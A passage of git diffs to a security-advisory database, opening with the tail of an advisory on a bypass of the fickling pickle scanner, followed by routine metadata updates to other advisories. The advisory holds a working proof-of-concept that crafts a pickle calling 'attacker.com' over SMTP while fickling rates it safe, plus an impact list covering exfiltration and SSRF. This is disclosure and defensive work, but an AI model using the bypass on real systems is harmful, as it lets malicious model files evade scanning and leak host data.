`SUSPICIOUS`.\n\nAdding a `BUILD` opcode with an empty dict after the `REDUCE` changes the generated\nAST to:\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25) # dangerous call\n_var1 = _var0 # BUILD step 1: intermediate reference\n_var1.__setstate__({}) # BUILD step 2: state call\nresult = _var1\n```\n\nNow `_var0` appears on the RHS of `_var1 = _var0`, a statement processed before the\nbreak, so `_var0` correctly enters `used` and `UnusedVariables` stays silent.\n\nThe `__setstate__` call is excluded from `OvertlyBadEvals` because\n`ASTProperties.visit_Call` places it in `calls` but not in `non_setstate_calls`\n(line 562), and `OvertlyBadEvals` only iterates `non_setstate_calls`.\n\nThe `SMTP(...)` call is skipped by `OvertlyBadEvals` because `_process_import` adds\n`SMTP` to `likely_safe_imports` for any stdlib module (line 550), and `OvertlyBadEvals`\nskips calls whose function name is in `likely_safe_imports` (lines 339-345).\n\n**Net result: zero warnings, severity `LIKELY_SAFE`.**\n\nThis flaw is generic -- it applies to any module not on the blocklist, not just the\nsix fixed in PR #233. Any future blocklist gap can be silently exploited using the\nsame `REDUCE + EMPTY_DICT + BUILD` pattern as long as this flaw remains unpatched.\n\n### Bypass opcode sequence\n\n```\nOffset Opcode Argument\n------ ------ --------\n0 PROTO 4\n2 GLOBAL 'smtplib' 'SMTP'\n16 SHORT_BINUNICODE 'attacker.com'\n30 BININT2 25\n33 TUPLE2\n34 REDUCE <- TCP connection opened here\n35 EMPTY_DICT\n36 BUILD <- suppresses UnusedVariables via flaw\n37 STOP\n```\n\nFickling's synthetic AST for this sequence (what all analysis passes inspect):\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25)\n_var1 = _var0\n_var1.__setstate__({})\nresult = _var1\n```\n\nNo analysis rule in fickling fires on this AST.\n\n### Proof of Concept\n\nRequires only `pip install fickling`. Save as `poc.py` and run.\n\n```python\nimport socket\nimport threading\nimport pickle\n\ndef build_bypass_pickle(host: str, port: int) -> bytes:\n h = host.encode(\"utf-8\")\n return b\"\".join([\n b\"\\x80\\x04\",\n b\"csmtplib\\nSMTP\\n\",\n b\"\\x8c\" + bytes([len(h)]) + h,\n b\"M\" + bytes([port & 0xFF, (port >> 8) & 0xFF]),\n b\"\\x86\", # TUPLE2\n b\"R\", # REDUCE\n b\"}\", # EMPTY_DICT\n b\"b\", # BUILD\n b\".\", # STOP\n ])\n\ndef run_poc():\n from fickling.analysis import check_safety\n from fickling.fickle import Pickled\n\n HOST, PORT = \"127.0.0.1\", 19902\n received = []\n\n def listener():\n srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n srv.bind((HOST, PORT))\n srv.listen(1)\n srv.settimeout(5)\n try:\n conn, addr = srv.accept()\n received.append(addr)\n conn.close()\n except socket.timeout:\n pass\n srv.close()\n\n t = threading.Thread(target=listener, daemon=True)\n t.start()\n\n raw = build_bypass_pickle(HOST, PORT)\n loaded = Pickled.load(raw)\n result = check_safety(loaded)\n\n print(f\"[*] fickling severity : {result.severity.name}\")\n print(f\"[*] fickling is_safe : {result.severity.name == 'LIKELY_SAFE'}\")\n\n assert result.severity.name == \"LIKELY_SAFE\", \"Bypass failed\"\n print(\"[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\")\n\n print(\"[*] Calling pickle.loads() to simulate victim loading the file...\")\n try:\n pickle.loads(raw)\n except Exception:\n pass\n\n t.join(timeout=5)\n\n if received:\n print(f\"[+] Incoming TCP connection received from {received[0]}\")\n print(\"[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\")\n else:\n print(\"[-] No TCP connection received (network blocked)\")\n print(\" fickling still rated LIKELY_SAFE -- static analysis bypass confirmed regardless\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n### Expected output\n\n```\n[*] fickling severity : LIKELY_SAFE\n[*] fickling is_safe : True\n[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\n[*] Calling pickle.loads() to simulate victim loading the file...\n[+] Incoming TCP connection received from ('127.0.0.1', 58412)\n[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\n```\n\nTested on Python 3.11.1, Windows. Not OS-specific.\n\n### Impact\n\nAn attacker distributing a malicious pickle file (e.g. a crafted ML model checkpoint)\ncan silently:\n\n- **Enumerate victims** -- receive a TCP callback every time the pickle is loaded,\n including in sandboxed environments\n- **Exfiltrate host identity** -- victim IP, hostname (via SMTP EHLO), and service\n banners are sent to the attacker's server\n- **Probe internal services (SSRF)** -- if the victim host can reach internal SMTP\n relays, IMAP stores, or FTP servers, the pickle probes those services on the\n attacker's behalf\n- **Establish a covert channel** -- protocol handshakes carry attacker-controlled\n bytes through a channel fickling explicitly labels safe\n\nThe `is_likely_safe()` helper (`fickling/analysis.py:468-474`) and the `--check-safety`\nCLI flag both gate on `severity == LIKELY_SAFE`. This bypass clears that gate\ncompletely with zero warnings.\n\n### Suggested fix\n\nWalk `statement.value` before the `break` so variables referenced only in the result\nassignment are correctly counted as used:\n\n```python\n# fickling/fickle.py:1183 -- suggested fix\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # scan RHS before breaking so variables used only here are marked as used\n for node in ast.walk(statement.value):\n if isinstance(node, ast.Name):\n used.add(node.id)\n break\n```\n\nThis is the same pattern already used for every other statement in the loop\n(lines 1200-1203). All 55 non-torch tests pass with this fix applied.\n\n---\n\n## Affected versions\n\nAll releases including `v0.1.7` (latest). Confirmed on latest `master` as of\n2026-02-19. Root cause 1 patched in PR #233 (master only, not yet released).\nRoot cause 2 unpatched as of this report.\n\n## Reporter\n\nAnmol Vats", "severity": [ { "type": "CVSS_V4", @@ -26,11 +26,14 @@ "introduced": "0" }, { - "last_affected": "0.1.7" + "fixed": "0.1.8" } ] } - ] + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.1.7" + } } ], "references": [ diff --git a/advisories/github-reviewed/2026/02/GHSA-8r7r-f4gm-wcpq/GHSA-8r7r-f4gm-wcpq.json b/advisories/github-reviewed/2026/02/GHSA-8r7r-f4gm-wcpq/GHSA-8r7r-f4gm-wcpq.json index 082c68414d88a..d1d657d2688c1 100644 --- a/advisories/github-reviewed/2026/02/GHSA-8r7r-f4gm-wcpq/GHSA-8r7r-f4gm-wcpq.json +++ b/advisories/github-reviewed/2026/02/GHSA-8r7r-f4gm-wcpq/GHSA-8r7r-f4gm-wcpq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8r7r-f4gm-wcpq", - "modified": "2026-02-19T20:30:38Z", + "modified": "2026-02-23T22:26:21Z", "published": "2026-02-19T20:30:38Z", "aliases": [ "CVE-2026-27196" @@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/statamic/cms/security/advisories/GHSA-8r7r-f4gm-wcpq" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27196" + }, { "type": "WEB", "url": "https://github.com/statamic/cms/commit/11ae40e62edd3da044d37ebf264757a09cc2347b" @@ -79,6 +83,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:30:38Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T05:17:29Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-c87c-78rc-vmv2/GHSA-c87c-78rc-vmv2.json b/advisories/github-reviewed/2026/02/GHSA-c87c-78rc-vmv2/GHSA-c87c-78rc-vmv2.json index 2ebd5ba597ff2..b743b006cf00c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-c87c-78rc-vmv2/GHSA-c87c-78rc-vmv2.json +++ b/advisories/github-reviewed/2026/02/GHSA-c87c-78rc-vmv2/GHSA-c87c-78rc-vmv2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c87c-78rc-vmv2", - "modified": "2026-02-19T20:29:05Z", + "modified": "2026-02-23T22:26:09Z", "published": "2026-02-19T20:29:05Z", "aliases": [ "CVE-2026-27194" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/man-group/dtale/security/advisories/GHSA-c87c-78rc-vmv2" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27194" + }, { "type": "WEB", "url": "https://github.com/man-group/dtale/commit/431c6148d3c799de20e1dec86c4432f48e3d0746" @@ -56,6 +60,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:29:05Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T05:17:29Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-mp4x-c34x-wv3x/GHSA-mp4x-c34x-wv3x.json b/advisories/github-reviewed/2026/02/GHSA-mp4x-c34x-wv3x/GHSA-mp4x-c34x-wv3x.json index 0415b5cae955d..c49577d6045a0 100644 --- a/advisories/github-reviewed/2026/02/GHSA-mp4x-c34x-wv3x/GHSA-mp4x-c34x-wv3x.json +++ b/advisories/github-reviewed/2026/02/GHSA-mp4x-c34x-wv3x/GHSA-mp4x-c34x-wv3x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mp4x-c34x-wv3x", - "modified": "2026-02-19T20:32:29Z", + "modified": "2026-02-23T22:26:40Z", "published": "2026-02-19T20:32:28Z", "aliases": [ "CVE-2026-27192" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/feathersjs/feathers/security/advisories/GHSA-mp4x-c34x-wv3x" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27192" + }, { "type": "WEB", "url": "https://github.com/feathersjs/feathers/commit/ee19a0ae9bc2ebf23b1fe598a1f7361981b65401" @@ -63,6 +67,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:32:28Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T04:15:58Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-ppf9-4ffw-hh4p/GHSA-ppf9-4ffw-hh4p.json b/advisories/github-reviewed/2026/02/GHSA-ppf9-4ffw-hh4p/GHSA-ppf9-4ffw-hh4p.json index 7b4aeb37a7b79..fe6866d92795d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-ppf9-4ffw-hh4p/GHSA-ppf9-4ffw-hh4p.json +++ b/advisories/github-reviewed/2026/02/GHSA-ppf9-4ffw-hh4p/GHSA-ppf9-4ffw-hh4p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-ppf9-4ffw-hh4p", - "modified": "2026-02-19T20:32:15Z", + "modified": "2026-02-23T22:26:31Z", "published": "2026-02-19T20:32:15Z", "aliases": [ "CVE-2026-27191" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/feathersjs/feathers/security/advisories/GHSA-ppf9-4ffw-hh4p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27191" + }, { "type": "WEB", "url": "https://github.com/feathersjs/feathers/commit/ee19a0ae9bc2ebf23b1fe598a1f7361981b65401" @@ -63,6 +67,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:32:15Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T04:15:58Z" } } \ No newline at end of file From df24333ebe4a7082bc41df66637523740936f7f7 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:29:00 +0000 Subject: [PATCH 66/77] Publish Advisories GHSA-29vq-49wr-vm6x GHSA-34p4-7w83-35g2 GHSA-4564-pvr2-qq4h GHSA-68rp-wp8r-4726 GHSA-8423-w5wx-h2r6 GHSA-9m9c-vpv5-9g85 GHSA-hmx5-qpq5-p643 GHSA-v7m3-fpcr-h7m2 --- .../2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json | 8 ++++++-- .../2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json | 8 ++++++-- .../2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json | 8 ++++++-- .../2026/02/GHSA-68rp-wp8r-4726/GHSA-68rp-wp8r-4726.json | 8 ++++++-- .../2026/02/GHSA-8423-w5wx-h2r6/GHSA-8423-w5wx-h2r6.json | 8 ++++++-- .../2026/02/GHSA-9m9c-vpv5-9g85/GHSA-9m9c-vpv5-9g85.json | 8 ++++++-- .../2026/02/GHSA-hmx5-qpq5-p643/GHSA-hmx5-qpq5-p643.json | 8 ++++++-- .../2026/02/GHSA-v7m3-fpcr-h7m2/GHSA-v7m3-fpcr-h7m2.json | 8 ++++++-- 8 files changed, 48 insertions(+), 16 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json index 7140a94e08730..1d6629b5fd33b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json +++ b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-29vq-49wr-vm6x", - "modified": "2026-02-19T20:32:45Z", + "modified": "2026-02-23T22:27:37Z", "published": "2026-02-19T20:32:45Z", "aliases": [ "CVE-2026-27199" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-29vq-49wr-vm6x" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27199" + }, { "type": "WEB", "url": "https://github.com/pallets/werkzeug/commit/f407712fdc60a09c2b3f4fe7db557703e5d9338d" @@ -60,6 +64,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:32:45Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T06:17:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json index 169cfbaa1df3c..d93d859f2120c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json +++ b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-34p4-7w83-35g2", - "modified": "2026-02-19T20:31:07Z", + "modified": "2026-02-23T22:27:29Z", "published": "2026-02-19T20:31:07Z", "aliases": [ "CVE-2026-27198" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/getformwork/formwork/security/advisories/GHSA-34p4-7w83-35g2" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27198" + }, { "type": "WEB", "url": "https://github.com/getformwork/formwork/commit/19390a0b408e084bdef86f3581e050f3ee51e7cd" @@ -63,6 +67,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:31:07Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T06:17:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json index 6b68425cd0bac..3bd8b7d8813d7 100644 --- a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json +++ b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4564-pvr2-qq4h", - "modified": "2026-02-20T19:26:53Z", + "modified": "2026-02-23T22:28:27Z", "published": "2026-02-18T17:39:00Z", "aliases": [ "CVE-2026-27487" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4564-pvr2-qq4h" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27487" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/pull/15924" @@ -72,6 +76,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T17:39:00Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:13Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-68rp-wp8r-4726/GHSA-68rp-wp8r-4726.json b/advisories/github-reviewed/2026/02/GHSA-68rp-wp8r-4726/GHSA-68rp-wp8r-4726.json index 40f765d013228..feebe71fbd65b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-68rp-wp8r-4726/GHSA-68rp-wp8r-4726.json +++ b/advisories/github-reviewed/2026/02/GHSA-68rp-wp8r-4726/GHSA-68rp-wp8r-4726.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-68rp-wp8r-4726", - "modified": "2026-02-19T20:45:42Z", + "modified": "2026-02-23T22:28:03Z", "published": "2026-02-19T20:45:41Z", "aliases": [ "CVE-2026-27205" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/pallets/flask/security/advisories/GHSA-68rp-wp8r-4726" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27205" + }, { "type": "WEB", "url": "https://github.com/pallets/flask/commit/089cb86dd22bff589a4eafb7ab8e42dc357623b4" @@ -60,6 +64,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:45:41Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T06:17:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-8423-w5wx-h2r6/GHSA-8423-w5wx-h2r6.json b/advisories/github-reviewed/2026/02/GHSA-8423-w5wx-h2r6/GHSA-8423-w5wx-h2r6.json index ab614514a36f7..2176dc562f92e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-8423-w5wx-h2r6/GHSA-8423-w5wx-h2r6.json +++ b/advisories/github-reviewed/2026/02/GHSA-8423-w5wx-h2r6/GHSA-8423-w5wx-h2r6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8423-w5wx-h2r6", - "modified": "2026-02-19T20:44:48Z", + "modified": "2026-02-23T22:27:55Z", "published": "2026-02-19T20:44:48Z", "aliases": [ "CVE-2026-27210" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/mpetroff/pannellum/security/advisories/GHSA-8423-w5wx-h2r6" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27210" + }, { "type": "WEB", "url": "https://github.com/mpetroff/pannellum/commit/9391ef8da6a6a98c6a9f8c97f101adb900523681" @@ -56,6 +60,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:44:48Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T06:17:01Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-9m9c-vpv5-9g85/GHSA-9m9c-vpv5-9g85.json b/advisories/github-reviewed/2026/02/GHSA-9m9c-vpv5-9g85/GHSA-9m9c-vpv5-9g85.json index 4b22e674a1db4..d62b08be70541 100644 --- a/advisories/github-reviewed/2026/02/GHSA-9m9c-vpv5-9g85/GHSA-9m9c-vpv5-9g85.json +++ b/advisories/github-reviewed/2026/02/GHSA-9m9c-vpv5-9g85/GHSA-9m9c-vpv5-9g85.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9m9c-vpv5-9g85", - "modified": "2026-02-19T20:32:37Z", + "modified": "2026-02-23T22:26:49Z", "published": "2026-02-19T20:32:37Z", "aliases": [ "CVE-2026-27193" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/feathersjs/feathers/security/advisories/GHSA-9m9c-vpv5-9g85" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27193" + }, { "type": "WEB", "url": "https://github.com/feathersjs/feathers/commit/ee19a0ae9bc2ebf23b1fe598a1f7361981b65401" @@ -63,6 +67,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:32:37Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T05:17:28Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-hmx5-qpq5-p643/GHSA-hmx5-qpq5-p643.json b/advisories/github-reviewed/2026/02/GHSA-hmx5-qpq5-p643/GHSA-hmx5-qpq5-p643.json index a5d8442bfa02a..b5faaf135066a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-hmx5-qpq5-p643/GHSA-hmx5-qpq5-p643.json +++ b/advisories/github-reviewed/2026/02/GHSA-hmx5-qpq5-p643/GHSA-hmx5-qpq5-p643.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hmx5-qpq5-p643", - "modified": "2026-02-19T20:28:36Z", + "modified": "2026-02-23T22:27:46Z", "published": "2026-02-19T20:28:35Z", "aliases": [ "CVE-2026-27212" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/nolimits4web/swiper/security/advisories/GHSA-hmx5-qpq5-p643" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27212" + }, { "type": "WEB", "url": "https://github.com/nolimits4web/swiper/commit/d3e663322a13043ca63aaba235d8cf3900e0c8cf" @@ -60,6 +64,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:28:35Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T06:17:01Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-v7m3-fpcr-h7m2/GHSA-v7m3-fpcr-h7m2.json b/advisories/github-reviewed/2026/02/GHSA-v7m3-fpcr-h7m2/GHSA-v7m3-fpcr-h7m2.json index f3ea861a1bf8d..802fa27f2fb94 100644 --- a/advisories/github-reviewed/2026/02/GHSA-v7m3-fpcr-h7m2/GHSA-v7m3-fpcr-h7m2.json +++ b/advisories/github-reviewed/2026/02/GHSA-v7m3-fpcr-h7m2/GHSA-v7m3-fpcr-h7m2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v7m3-fpcr-h7m2", - "modified": "2026-02-19T22:05:40Z", + "modified": "2026-02-23T22:28:11Z", "published": "2026-02-19T22:05:40Z", "aliases": [ "CVE-2026-27206" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/zumba/json-serializer/security/advisories/GHSA-v7m3-fpcr-h7m2" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27206" + }, { "type": "WEB", "url": "https://github.com/zumba/json-serializer/commit/bf26227879adefce75eb9651040d8982be97b881" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T22:05:40Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T07:16:11Z" } } \ No newline at end of file From bc90ce76ce4c508c2f530aa0925345b8bfc28ce2 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:30:54 +0000 Subject: [PATCH 67/77] Publish Advisories GHSA-49pc-8936-wvfp GHSA-cxpw-2g23-2vgw GHSA-jfv4-h8mc-jcp8 GHSA-q5fh-2hc8-f6rq GHSA-qhp6-635j-x7r2 GHSA-r6h2-5gqq-v5v6 GHSA-w45g-5746-x9fp GHSA-wh94-p5m6-mr7j --- .../02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json | 8 ++++++-- .../02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json | 8 ++++++-- .../02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json | 8 ++++++-- .../02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json | 11 ++++++++--- .../02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json | 8 ++++++-- .../02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json | 8 ++++++-- .../02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json | 8 ++++++-- .../02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json | 8 ++++++-- 8 files changed, 50 insertions(+), 17 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json index 2fed98112dc02..3e50474af8813 100644 --- a/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json +++ b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-49pc-8936-wvfp", - "modified": "2026-02-20T21:14:50Z", + "modified": "2026-02-23T22:30:18Z", "published": "2026-02-20T21:14:49Z", "aliases": [ "CVE-2026-27492" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/lettermint/lettermint-node/security/advisories/GHSA-49pc-8936-wvfp" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27492" + }, { "type": "WEB", "url": "https://github.com/lettermint/lettermint-node/commit/24a17acbc2429c5eb30391f9df3dc0ea7aaf4de1" @@ -60,6 +64,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:14:49Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T11:15:57Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json b/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json index 0c624b24b1508..f0c42d71f6728 100644 --- a/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json +++ b/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cxpw-2g23-2vgw", - "modified": "2026-02-20T21:52:44Z", + "modified": "2026-02-23T22:30:08Z", "published": "2026-02-20T21:52:44Z", "aliases": [ "CVE-2026-27576" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cxpw-2g23-2vgw" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27576" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/63e39d7f57ac4ad4a5e38d17e7394ae7c4dd0b9c" @@ -71,6 +75,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:52:44Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:13Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json index 176c4fd9a0cb9..8036b28542709 100644 --- a/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json +++ b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jfv4-h8mc-jcp8", - "modified": "2026-02-20T19:26:42Z", + "modified": "2026-02-23T22:28:47Z", "published": "2026-02-18T17:41:09Z", "aliases": [ "CVE-2026-27486" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jfv4-h8mc-jcp8" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27486" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/6084d13b956119e3cf95daaf9a1cae1670ea3557" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T17:41:09Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json b/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json index 0ee743fdace27..f3b862271ec4e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json +++ b/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q5fh-2hc8-f6rq", - 